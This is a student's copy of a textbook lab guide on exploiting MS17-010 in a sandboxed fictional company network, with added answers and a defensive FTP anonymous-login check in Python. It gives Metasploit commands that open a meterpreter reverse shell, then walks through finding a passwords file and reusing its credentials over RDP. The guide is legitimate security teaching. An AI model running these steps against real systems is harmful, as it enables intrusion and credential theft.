Identifying and Exploiting Vulnerabilities (3e) - Lab01_Identifying_and_Exploiting_Vulnerabilities_3e-ANISHA ASAD

The document outlines a lab exercise focused on identifying and exploiting vulnerabilities in IT systems, specifically using a fictional company, Acme Corporation, as a case study. It includes a preparation checklist, an introduction to vulnerabilities and threats, and detailed steps for conducting the lab, which involves identifying Windows system versions, researching vulnerabilities, and exploiting them using tools like the Metasploit Framework. The lab aims to provide hands-on experience with risk management in information systems and culminates in a lab report deliverable.


Identifying and Exploiting Vulnerabilities (3e)

Managing Risk in Information Systems, Third Edition - Lab 01

Before You Begin – ANISHA ASAD


Welcome! JBL Cloud Labs are your opportunity to gain valuable hands-on experience with
professional-grade tools and techniques as you work through the lab exercises provided in the
onscreen lab guide. The use of virtualization enables you to perform all of the tasks in the lab guide in
a live environment without putting your personal device or institution's assets at risk.

Before you begin the guided lab exercises, please review the following preparation checklist.

1. Run the System Checker. The System Checker will confirm that your browser and network
connection are ready to support virtual labs.

2. Review the Common Lab Tasks document. This document provides an overview of the virtual
lab environment and outlines several of the recurring tasks found in the lab exercises.

3. When you've finished, use the Disconnect button to end your session and create a
StateSave. To end your lab session and save your work, click the Disconnect button in the
upper-right corner of the Lab View toolbar. When prompted, assign a name for your StateSave
(we recommend using the Section, Part, and Step number where you stopped) and click
Continue. Please note that a StateSave will preserve any changes written to disk in your lab
session. A StateSave will not preserve the execution state, including open windows and active
processes - similar to restarting your computer.
If you close your browser window without disconnecting, your lab session will automatically
end after 5 minutes.

4. Technical Support is here to help! Our technical support team is available 24/7 to help
troubleshoot common issues.
Please note that the 24/7 support team is Level 1 only, and cannot assist with questions about
lab content or the array of software used in the labs. If you believe you’ve identified an error in
the lab guide or a problem with the lab environment, your ticket will be escalated to the Jones
& Bartlett Learning product team for review. In the meantime, we recommend resetting the lab
(Options > Reset Lab) or reaching out to your instructor for assistance.

Introduction
A vulnerability may be defined as a weakness in an asset within an IT infrastructure or—more broadly
—a flaw in any system or business process that can be exploited. Vulnerabilities exist passively in an
asset or asset group until they have been patched by a security professional or exploited by a hacker.

Every asset type—including software, networks, computers, humans, physical perimeters, etc.—
contains vulnerabilities of some kind.

In many ways, the security industry is driven by vulnerabilities. Countless security products, methods,
and services have been built as solutions to managing vulnerabilities in services and assets. In an
ideal world, a threat would be unable to exploit an asset that does not contain or present a
vulnerability. However, as a security professional, you must assume that every asset will have
vulnerabilities in some form and that no system can ever be 100% secure.

In contrast to the passive nature of vulnerabilities, threats are active agents that attempt to discover
and exploit vulnerabilities. Understanding the relationship between threats and vulnerabilities is
essential to mitigating risks. Risk analysis may be defined as the process of systematically evaluating
the features of threats (such as capabilities, motivations, types) and vulnerabilities (such as severity).
The features of threats and vulnerabilities help security professionals to estimate the likelihood and
impact values of exploitation. Likelihood and impact values are key metrics that help companies
assess risk.

In this lab, you will identify and exploit vulnerabilities in the IT assets of a fictional company, the Acme
Corporation. You can find vulnerabilities in many places, including operating systems and business
processes. In other words, you can find both technical and non-technical vulnerabilities. From a
technical perspective, an exploit is software, data, or a sequence of commands that takes advantage
of a vulnerability and results in unintended behavior on the target software. By comparison, exploitation
of a vulnerability in a business process or human can occur in a very “social” way, such as via a social
engineering attack. In this lab, you will explore both the passive nature of vulnerabilities and the
dynamic nature of a threat agent performing exploitation. You will assume the role of a system
administrator auditing an IT infrastructure, a process that mirrors that of a threat agent attempting to
exploit and gain unauthorized access to the system.

Lab Overview
This lab has four parts, which should be completed in the order specified.

1. In the first part of the lab, you will identify the version and build of a Windows system.

2. In the second part of the lab, you will research and identify a vulnerability in the version
and build of Windows you identified. You will also confirm the availability of the exploit code.

3. In the third part of the lab, you will use the Metasploit Framework on Kali Linux to exploit
the vulnerability.

4. In the fourth part of the lab, you will perform a file search on the exploited machine to
locate information that may allow you to further extend the scope of your attack.

Finally, if assigned by your instructor, you will complete a series of challenge exercises that allow you
to use the skills you learned in the lab to conduct independent, unguided work—similar to what you
will encounter in a real-world situation.

Learning Objectives
Upon completing this lab, you will be able to:

1. Describe threats, vulnerabilities, and exploits.

2. Practice different methods for identifying vulnerabilities.

3. Research vulnerabilities and exploits on different platforms.

4. Practice different methods for exploiting vulnerabilities.

5. Expand the scope of an attack by extracting sensitive information from an exploited system.

Topology
This lab contains the following virtual machines. Please refer to the network topology diagram below.

vWorkstation (Windows Server 2019)

TargetWindows01 (Windows Server 2019)


Kali (Kali Linux)

Tools and Software


The following software and/or utilities are required to complete this lab. Students are encouraged to
explore the Internet to learn more about the products and tools used in this lab.

Metasploit Framework
FileZilla

Deliverables
Upon completion of this lab, you are required to provide the following deliverables to your instructor:

1. Lab Report file, including screen captures of the following:

About Windows dialog box and the Windows version number


MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows
Code Execution module in the Rapid7 Vulnerability and Exploit Database
Current user on the TargetWindows01 server
TargetWindows01 Desktop and the yourname_was_here folder
Contents of the password.txt file
Contents of the file containing sensitive information

Contents of the discovered file


Challenge: Contents of the file containing sensitive information

2. Any additional information as directed by the lab:

Challenge: What are some root causes of storing personal information in clear text files?
Challenge: What are some root causes of using an FTP service on the internal network?
Challenge: What are some root causes of having anonymous login enabled on FTP service?

Guided Exercises
Note: In this section of the lab, you will follow a step-by-step walk-through of the objectives for this lab
to produce the expected deliverable(s).

1. Review the Common Lab Tasks document.

Frequently performed tasks, such as making screen captures and downloading your Lab
Report, are explained in the Common Lab Tasks document. You should review these tasks
before starting the lab.

2. Proceed with Part 1.

Part 1: Identify the Version and Build of a Windows System


Note: In this lab, you will interact with two critical systems at the Acme Corporation: the vWorkstation
and TargetWindows01. The vWorkstation is a client machine of the Acme Corporation and a member
computer of the acme.com domain. TargetWindows01 is the domain controller for the acme.com
domain. A domain controller is responsible for storing all user and computer accounts in a Windows
domain, as well as the authentication and authorization of those users and computers and the
management of domain-wide security policies. Therefore, a domain controller is the heart and brain of
a Windows domain. In this part of the lab, you will identify the exact version of the Windows Server
2016 operating system running on the TargetWindows01 machine.

Each Microsoft Windows operating system has a well-known name—for example, Server 2016,
Windows 10, XP, Vista, etc. However, behind these names are actual Windows version numbers. More
specific than a version number, Windows operating systems also have “build numbers,” which identify
the major updates that have been applied to that Windows version. Attackers and defenders can use
this information to search for vulnerabilities specific to a given Windows operating system.

In practice, there are many different methods of identifying vulnerabilities on a given system. The most
common way is to perform a vulnerability scan against the target. Vulnerability scanning is considered
a black-box testing method because it identifies vulnerabilities from an external point of view and
without checking the internal structures of the target system. Both attackers and security professionals
can practice vulnerability scanning. However, professional hackers do not usually use scanners, which
generate a lot of “noise,” including log generation on the target.

In this part of the lab, think of yourself as a system administrator. You will not be using a vulnerability
scanner to discover vulnerabilities. Instead, you will identify vulnerabilities by determining the version
of the target system’s operating system and then initiating a well-crafted search against a vulnerability
database.

You will begin the lab on the vWorkstation machine (172.30.0.2). Administrator credentials are
provided below for reference.

Username: Administrator
Password: P@ssw0rd!

1. On the Lab View toolbar, select TargetWindows01 from the Virtual Machine menu to connect
to the TargetWindows01 domain controller.

Select TargetWindows01

2. From the TargetWindows01 taskbar, click the Start button, then type winver and press
Enter to open the About Windows dialog box.

Winver command

Note: This dialog box contains essential information about the current Windows installation, including
the version and build numbers. Confirm that the Windows version number is 1607 and the build
number is 14393.0. If you check this version and build number against the information at the Microsoft
product page at https://docs.microsoft.com/en-us/windows/release-information/, you will see that build
number 14393.0 dates back to August 2016. This means that the Windows Server 2016 operating
system running on TargetWindows01 has not been updated since that date. You can assume that this
version will have many security vulnerabilities, including some that can be remotely exploited without
any user interaction.

3. Make a screen capture showing the About Windows dialog box and the Windows version
number.

4. Click OK to close the dialog box.

Part 2: Research and Identify Vulnerabilities and Exploits


Note: One of the best resources for researching vulnerabilities is the Common Vulnerabilities and
Exposures (CVE) database. The CVE database is maintained by a non-profit organization called The
MITRE Corporation. According to the CVE website:

[The CVE database is] a dictionary that provides definitions for publicly disclosed cybersecurity
vulnerabilities and exposures. The goal of the CVE is to make it easier to share data across separate
vulnerability capabilities (tools, databases, and services) with these definitions. CVE Entries are
comprised of an identification number, a description, and at least one public reference.
(https://cve.mitre.org/about/faqs.html)

Every vulnerability discovered in a software product is assigned a unique CVE number. The format of
the CVE number is CVE-year-number, where year is the year the vulnerability was first discovered
and number is a numeric value of at least four digits.

Each vulnerability is also associated with a CVSS score. The Common Vulnerability Scoring System
(CVSS) is used to calculate and assign a numerical severity value to CVEs by taking base, temporal,
and environmental characteristics of the vulnerability into account. A CVSS score can be between 0
(the lowest severity) and 10 (the highest severity). You can think of 0 as the condition where there is
no vulnerability. Vulnerabilities with low CVSS scores, such as 1, 2, or 3, usually do not impact
confidentiality, integrity, and availability too much. These kinds of vulnerabilities also require physical
access to be exploited. The attack complexity of low-severity vulnerabilities is usually high. They
require user interaction on the target's systems; for example, the victim must open the e-mail sent by
the attacker. Last but not least, vulnerabilities with low severity levels usually require some prior
privilege on the target systems.

The characteristics of vulnerabilities with low CVSS scores are entirely opposite to those of
vulnerabilities with high severity levels. High-severity vulnerabilities have significant impacts on
confidentiality, integrity, and availability, and do not require physical presence or user interaction.
Attack complexities are usually low, meaning that an attacker can quickly develop an exploit. These
extremely dangerous vulnerabilities do not require any prior privilege on the target system, meaning
that an attacker can exploit the vulnerability and infiltrate into the systems without any previous rights
such as guest account password, user account credentials, etc.

In this part of the lab, you will use the Common Vulnerabilities and Exposures (CVE) database to
research and identify vulnerabilities in the version and build of Windows Server 2016 that you just
identified on your domain controller.

1. On the Lab View toolbar, select vWorkstation from the Virtual Machine menu to return to your
primary workstation.

2. On the vWorkstation desktop, double-click the Chrome icon to open a new browser window.

Chrome icon

3. In the browser navigation bar, type http://cve.mitre.org and press Enter to navigate to
the Common Vulnerabilities and Exposures database.

CVE database

4. On the CVE page’s navigation bar, click the Search CVE List link to open the Search CVE
List page.

Search CVE List

5. On the Search CVE List page, type Windows 1607 remote code execution in the
Search field, then click Submit to search for vulnerabilities related to Windows Server 2016.

Note that the search term includes "1607", the version number of Windows Server 2016.

Run a search

6. Review the search results.

Note the number of total vulnerabilities. CVEs are sorted according to their release dates in
descending order. Note the year portion of the identifier of the earliest CVE, at the bottom of the
list, which is the same year as the release year of Windows Server 2016.

Search results

7. In the search results, locate the entry for CVE-2017-0143.

This is the vulnerability that you will exploit in Part 3 using the Metasploit Framework.

CVE-2017-0143

8. Click the CVE-2017-0143 link to view more information about this vulnerability.

9. Review the Description section of the CVE-2017-0143 page.

The Description should confirm that Windows Server 2016 is affected by this vulnerability.

CVE-2017-0143 Description

10. At the top of the CVE page, click the Learn more at National Vulnerability Database (NVD)
link.

This will forward you to the vulnerability page at the NVD site. The National Vulnerability
Database is another vulnerability database maintained by the U.S. government. NVD staff
perform analysis on CVEs and provide more information about CVEs, including the CVSS
score.

NVD webpage

11. On the NVD page for CVE-2017-0143, locate the Base Score of CVE-2017-0143 in the
Severity section of the page.

A score of 8.1 is considered a high value.

Base Score

12. On the right-hand side, position your cursor over the Vector value.

A pop-up window will show additional characteristics of the vulnerability, including Attack
Vector; Attack Complexity; Privileges Required; User Interaction; and Impacts on
Confidentiality, Integrity, and Availability.

Additional characteristics

13. Make a screen capture showing the NVD page for CVE-2017-0143, including the Base
Score.

Note: In the next steps, you will review one additional repository of important information about
vulnerabilities: the Microsoft Security Bulletin. Similar to the CVE database, but restricted to Microsoft
products, Microsoft maintains its own records of vulnerabilities discovered in its software. Microsoft
also assigns its own unique identifiers, which are commonly used in tools like the Metasploit
Framework to identify vulnerabilities and exploits.

14. In the browser navigation bar, type Microsoft Security Bulletin CVE-2017-0143
and press Enter to run a Google search.

Run a Google search

15. From the search results, click the Microsoft webpage titled Microsoft Security Bulletin
MS17-010 - Critical | Microsoft Docs.

At the time of writing, this page appeared as the first result. However, the order of the search
results may change over time. If you do not see this page as the first result, you should be
able to locate it within the first ten search results.

Search results

16. Review the Microsoft Security Bulletin page to confirm that Microsoft Security Bulletin Number
MS17-010 has been prepared for CVE-2017-0143.

Note that MS17-010 also references several additional CVE numbers. It is not uncommon for a
single Microsoft Security Bulletin to encompass several vulnerabilities associated with the
same root cause.

Microsoft Security Bulletin

Note: From this point onward, you can begin to think of yourself as an attacker, white-hat hacker, or
penetration tester. In the next steps, you will check whether the Metasploit Framework has an exploit
for CVE-2017-0143 or MS17-010. The Metasploit Framework is an open-source penetration testing
tool that contains more than 3000 exploits (and counting). It is a very sophisticated tool that can be
used both by security professionals and cybercriminals. Metasploit hosts not only exploits but also
shellcode—pieces of post-exploitation code that help penetration testers and hackers to perform further
actions on the target after exploitation. The Metasploit Framework is the best-known component of the
Metasploit project, which is now owned by security company Rapid7. In the next steps, you will use
Rapid7’s vulnerability and exploit database to look up Metasploit exploits for CVE-2017-0143.
However, because the Metasploit Framework commonly uses Microsoft Bulletin Numbers to tag
exploits related to Microsoft products, you will use MS17-010 as your search term.

17. In the browser navigation bar, type https://www.rapid7.com/db/ and press Enter to
navigate to the vulnerability and exploit database maintained by Rapid7.

Rapid7 Vulnerability and Exploit Database

18. On the Vulnerability & Exploit Database page, type MS17-010 in the Search box and select
Module from the Type menu, then press Enter to search for modules related to MS17-010.

Run a search

Note: The Metasploit Framework uses modules to exploit a target. In addition to the exploit modules,
there are other kinds of modules that perform tasks such as scanning and post-exploitation. Your
search results should include five modules related to MS17-010 and—by extension—CVE-2017-0143.

19. From the search results, click the MS17-010
EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command
Execution module.

Search results

20. On the module page, review the Description and Module Options.

You will use some of the commands listed under Module Options when you use the Metasploit
Framework in Part 3.

Module Description

21. Make a screen capture showing the MS17-010
EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code
Execution module in the Rapid7 Vulnerability and Exploit Database.

Note: This concludes your vulnerability and exploit research. In Part 3, you will exploit the vulnerability
and open a remote shell on TargetWindows01.

Part 3: Use the Metasploit Framework to Exploit a Vulnerability


Note: In Part 2 of this lab, you identified a remotely exploitable vulnerability in the version of Windows
Server 2016 installed on TargetWindows01. You also confirmed that exploit code is available for this
vulnerability (CVE-2017-0143). You will now exploit this vulnerability using the
Metasploit Framework on the Kali machine and open a remote shell on the target machine. The Kali
machine in this lab environment can be considered an attacker who was able to access the acme.com
network in some way. Alternatively, Kali may also be considered an auditing system managed by the
ACME security team.

Kali Linux is a special Linux distribution designed for security professionals and penetration testers. It
has more than 350 tools for different purposes, including but not limited to vulnerability scanning,
reverse engineering, exploitation, digital forensics, web application attacks, and wireless security. Kali
Linux is free and maintained by a company called Offensive Security.

The Metasploit Framework is one of the tools that comes installed on Kali Linux. In this part of the lab,
you will use Metasploit to exploit the vulnerability and to open a remote shell on the target system after
exploitation. A shell is an essential method of performing post-exploitation actions on the target
system. As with legitimate remote shells such as SSH and telnet, a remote shell enables an attacker
to execute commands on the remote system as if they had accessed the computer locally.

1. On the Lab View toolbar, select Kali from the Virtual Machine menu to connect to the Kali
virtual machine.

2. At the Kali login screen, type root in the Username field and press Enter.

Username

3. When prompted, type toor in the Password field and press Enter.

You have now signed in as the root user.

Password

4. From the menu bar, click the Activities menu, then click the Terminal icon to open a new
terminal window.

Open a terminal window

5. At the command prompt, type msfconsole and press Enter to start Metasploit from the
command line console.

Start Metasploit

6. When the msf5 > prompt appears, type use exploit/windows/smb/ms17_010_psexec
and press Enter.

This command is used to select the exploit module to be used.

Select the exploit module

7. At the msf5 prompt, type set rhosts 172.30.0.3 and press Enter.

This command sets the remote host we want to exploit. In this example, it is TargetWindows01
(Windows Server 2016).

Set remote host

8. At the msf5 prompt, type set payload windows/meterpreter/reverse_tcp and
press Enter.

This command determines the payload, which is executed right after successful exploitation.
Meterpreter is the built-in Metasploit payload for stealthy, powerful, and extensible command
and control activities. Meterpreter payloads are used by both attackers and security
researchers to access the target computer and execute code on it with the help of a shell.

Set the payload

9. At the msf5 prompt, type set lhost 172.30.0.4 and press Enter.

This command specifies the local IP address that will be ready for connections on the
attacker's computer.

Set local host

10. At the msf5 prompt, type set lport 443 and press Enter.

This command sets the local port that will be ready for connections on the attacker's computer.
After the exploit is executed, the payload code will let TargetWindows01 connect to the
attacker's machine by using this port.

Set local port

11. At the msf5 prompt, type exploit and press Enter.

This command runs the selected exploit module against the target system.

Begin exploit

12. At the meterpreter prompt, type shell and press Enter.

This command gives you cmd.exe over Meterpreter, meaning that you have now
opened a remote shell on TargetWindows01 with the System account. Please note that you
didn’t need a username or password to do this.

Open a remote shell

Note: The System account is a privileged internal account that exists on every Windows computer.
This account is used by the operating system and by services that run under Windows. It is an internal
account that does not show up in the User Manager. By default, the System account is granted Full
Control permissions to all files. Here, the System account has the same functional rights and
permissions as the Administrator account.

You can think of this terminal window as a CMD shell opened on TargetWindows01. You can perform
almost every malicious action within this window, including view, delete, change, and create files;
install programs such as rootkits; infect the computer with a virus; create a user account; delete a user
account; and shut down the computer.

Now, think about the effects of this exploitation, the potential impact on confidentiality, integrity, and
availability on the target machine. Also, remember that the CVSS score of the vulnerability was high.
Did you require physical access to Windows Server 2016? Did you need a user interaction at the
target system? Did you have prior privilege on the target system? The answers to all of these
questions are No.

At this point, you should think about how critical it is to patch systems as quickly as possible,
especially after the announcement of the vulnerabilities with high severity levels. Vulnerabilities with
high CVSS scores usually end up with high risk levels for companies. Think about different
vulnerabilities on the target system. CVE-2017-0143 itself is a vulnerability that exists in the target
machine. The lack of patch management procedures might be seen as just another vulnerability, but it can
also be thought of as the root cause. Consider that the attacker's machine (Kali Linux) has direct
access to the target machine; the lack of a firewall between the domain controller and the untrusted
network can be regarded as yet another vulnerability. All of these vulnerabilities are considered in the
risk management process.

Exploitation is the action of the threat. After successful exploitation, we don't talk about risk, risk
assessment, and risk analysis any more, as these concepts are used to measure the potential harm
caused by a threat. After the exploitation, we will have real harm that requires incident response
procedures.

13. At the remote shell prompt, type whoami and press Enter to see the current user on the
TargetWindows01 server.

See the current user

14. Make a screen capture showing the current user on the TargetWindows01 server.

15. At the remote shell prompt, type cd /Users/Administrator/Desktop and press Enter
to change the current directory to the Administrator’s Desktop.

Change directory

16. At the remote shell prompt, type md yourname_was_here and press Enter, replacing
yourname with your first name, to create a new directory on the Desktop.

Create a new directory

17. On the Lab View toolbar, select TargetWindows01 from the Virtual Machine menu to connect
to the TargetWindows01 virtual machine.

18. Make a screen capture showing the TargetWindows01 Desktop and the
yourname_was_here folder.

Part 4: Retrieve Sensitive Files


Note: In Part 3 of this lab, you exploited a vulnerability on a remote server and you were able to
access the machine over a remote shell. However, an attacker will rarely stop there. With privileged
system access, an attacker is likely to perform further searches on the compromised computer.

In this part of the lab, you will perform a file search on the exploited machine to locate information that
may allow you to further extend the scope of your attack.

1. On the Lab View toolbar, select Kali from the Virtual Machine menu to connect to the Kali
virtual machine.

2. At the command prompt, type cd / and press Enter to change your current directory to the
root directory.

Change directory

3. At the command prompt, type dir /s passwords* and press Enter to search the current directory
and all of its subdirectories for files whose names begin with passwords.

Your search should return a file named passwords.txt, which seems like it could contain
something of interest.

File search

Note: Unfortunately, it is all too common for employees to keep lists of important passwords on their
workstations. If an attacker is able to exploit a vulnerable system, they may use a similar command to
search the file system for information—such as user credentials—that will allow them to extend their
reach into other systems on the network.

4. At the command prompt, type cd C:/Users/Administrator/Documents and press
Enter to change your current directory to the location of the passwords.txt file.

Change directory

5. At the command prompt, type type passwords.txt and press Enter to display the
contents of the file.

6. Make a screen capture showing the contents of the passwords.txt file.

7. At the command prompt, type exit and press Enter three times to close the remote shell,
meterpreter, and Metasploit.

Note: As an attacker, you now have in hand a list of user credentials from the exploited machine. In
the next steps, you will use that information to attempt to access other computers on the network. You
will access the vWorkstation using a remote desktop (RDP) connection from the Kali machine.

8. At the command prompt, type rdesktop 172.30.0.2 and press Enter to open an RDP
connection to the vWorkstation.

RDP command

9. When prompted, type yes and press Enter to continue.

The vWorkstation log-in screen will appear in a new rdesktop window.

vWorkstation log-in

10. In the rdesktop window, log in using the first set of credentials you found in the
passwords.txt file.

Hint: You will need to use the prefix ACME\ before the username to ensure you are logging in
as a domain user.

11. On the vWorkstation, search common user folders to locate another file containing
sensitive information.

12. Make a screen capture showing the contents of the file containing sensitive
information.

Note: In this part of the lab, you identified a different sort of vulnerability—storing sensitive information
in unencrypted files. However, when performing risk analysis, you should always consider the root
cause of the vulnerability. CVE-2017-0143 was a technical vulnerability that existed within the
operating system, but the absence or failure of patch management procedures may be considered the
root cause of CVE-2017-0143 being successfully exploited by an attacker. Think of some possible root
causes of a user storing passwords and financial information in cleartext. For example, this may be
considered the result of poor employee security training. What about the length and complexity of the
passwords in the text file? This is a clear indication of a lack of effective password policies.

Challenge Exercises
Note: The following exercises are provided to allow independent, unguided work using the skills you
learned earlier in this lab—similar to what you would encounter in a real-world situation.
In a real-world setting, you will not always need to use sophisticated tools like Metasploit Framework
to exploit vulnerabilities. You applied this in Part 4 by searching for critical information within servers
and client computers. In this section of the lab, you will perform a similar task. Your goal is to locate
critical personal information stored on TargetWindows01.

Part 1: Use FTP to Extract Sensitive Information


FTP stands for File Transfer Protocol. It is one of the oldest protocols still in use, and companies continue to
use it to share files. It is common to see "anonymous" login enabled on FTP servers.

Acme company is one of those organizations that still uses legacy services like FTP. Suppose a
human resources employee at Acme company recently used the FTP service to transfer a file to their
computer, but forgot to delete the file from the FTP folder.

As an attacker, log in anonymously to the FTP service on TargetWindows01 from the vWorkstation
machine. Next, examine commonly used User folders to locate the critical file. Once you have located
the file, transfer it to the vWorkstation, then open the file and review its contents.

Make a screen capture showing the contents of the file containing sensitive information.
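The weak setting this challenge relies on is anonymous login on the FTP service. As an added example that is not part of the lab and not code from Acme or the lab environment, the following Python performs the audit check a defender would run to find that setting: it carries out only the USER/PASS login exchange of the FTP control channel and never lists or transfers files. Because no real FTP server is assumed, the block embeds a constructed in-process fake FTP control channel whose anonymous policy can be toggled, so the check can be demonstrated offline against both the weak configuration and the corrected one.

```python
"""Audit check: does an FTP server accept anonymous login? (added example)

Only the login step of the FTP control channel is exercised. The fake server
below is constructed for the demonstration and speaks just enough FTP for it.
"""
import socketserver
import threading
from ftplib import FTP, error_perm


def anonymous_login_allowed(host: str, port: int = 21, timeout: float = 5.0) -> bool:
    """Return True if the server answers 230 to USER anonymous / PASS <address>.

    A 5xx reply (typically 530) means anonymous access is refused.
    Connection errors propagate to the caller so an unreachable host is
    never mistaken for a hardened one.
    """
    ftp = FTP()
    try:
        ftp.connect(host, port, timeout=timeout)
        ftp.login("anonymous", "audit@example.invalid")  # constructed contact address
        return True
    except error_perm:
        return False
    finally:
        try:
            ftp.quit()
        except Exception:
            ftp.close()


class _FakeFtpHandler(socketserver.StreamRequestHandler):
    """Minimal FTP control-channel dialogue: greeting, USER, PASS, QUIT."""

    allow_anonymous = True  # the policy under test; overridden per server below

    def handle(self):
        self.user = None
        self.wfile.write(b"220 constructed test FTP server ready\r\n")
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd, _, arg = line.decode("ascii", "replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                self.user = arg.lower()
                self.wfile.write(b"331 Password required\r\n")
            elif cmd == "PASS":
                if self.user in ("anonymous", "ftp") and self.allow_anonymous:
                    self.wfile.write(b"230 Anonymous access granted\r\n")
                else:
                    self.wfile.write(b"530 Login incorrect\r\n")
            elif cmd == "QUIT":
                self.wfile.write(b"221 Goodbye\r\n")
                return
            else:
                self.wfile.write(b"502 Command not implemented\r\n")


def start_fake_server(allow_anonymous: bool):
    """Start a fake FTP control channel on a random loopback port."""
    handler = type("Handler", (_FakeFtpHandler,), {"allow_anonymous": allow_anonymous})
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), handler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def demo() -> dict:
    """Run the check against the weak setting and the corrected setting."""
    results = {}
    for name, policy in (("anonymous-enabled", True), ("anonymous-disabled", False)):
        server, port = start_fake_server(policy)
        try:
            results[name] = anonymous_login_allowed("127.0.0.1", port)
        finally:
            server.shutdown()
            server.server_close()
    return results


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name}: anonymous login {'ALLOWED' if allowed else 'refused'}")
```

Pointed at a real host, anonymous_login_allowed is the finding to record in the risk register; the fake server only exists so the block can show a 230 and a 530 reply without any FTP service being present.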

Part 2: Identify Root Causes


As an attacker, you were able to connect to a legacy Internet protocol and locate a file with sensitive
information. Think about the root cause or root causes of this problem, then answer the following
questions:

What are some root causes of storing personal information in clear text files? People often
store personal information in clear text files due to forgetfulness or a lack of awareness about
security risks. Without proper education from a cybersecurity expert, they may not realize the
dangers. Encryption, while a best practice, can feel complicated, slow, and expensive, leading
many to prioritize convenience over security. Some consciously choose to skip encryption,
believing the effort isn’t worth the hassle. Lastly, the “It won’t happen to me” mindset plays a big
role—many assume they won’t be targeted, so they neglect basic security measures.
Unfortunately, these habits leave sensitive data vulnerable to breaches, making it crucial to
prioritize security, even when it feels inconvenient.

What are some root causes of using an FTP service on the internal network? Many use FTP on
internal networks due to the belief that “It won’t happen to me,” assuming security risks are
minimal. A lack of education also plays a role—some may not fully understand what FTP does or
that more secure, equally user-friendly alternatives exist. Others consciously choose FTP
because it has been around for decades, is widely compatible, and feels reliable. While it may
seem like a safe choice, FTP lacks encryption and leaves data vulnerable to interception.
Relying on outdated technology for convenience can create unnecessary security risks, making
it essential to explore modern, more secure file transfer solutions.

What are some root causes of having anonymous login enabled on FTP service? Anonymous
login on an FTP service is often enabled for convenience, especially if the system doesn’t store
sensitive data. In such cases, users may see little risk and prioritize ease of access over
security. Another common reason is simply forgetting to disable it or not realizing it can be
turned off. Many users may not be aware of the security risks or assume their setup isn’t a
target. However, leaving anonymous login enabled can expose systems to unauthorized access,
making it important to review and adjust security settings, even when the perceived risk seems
low.
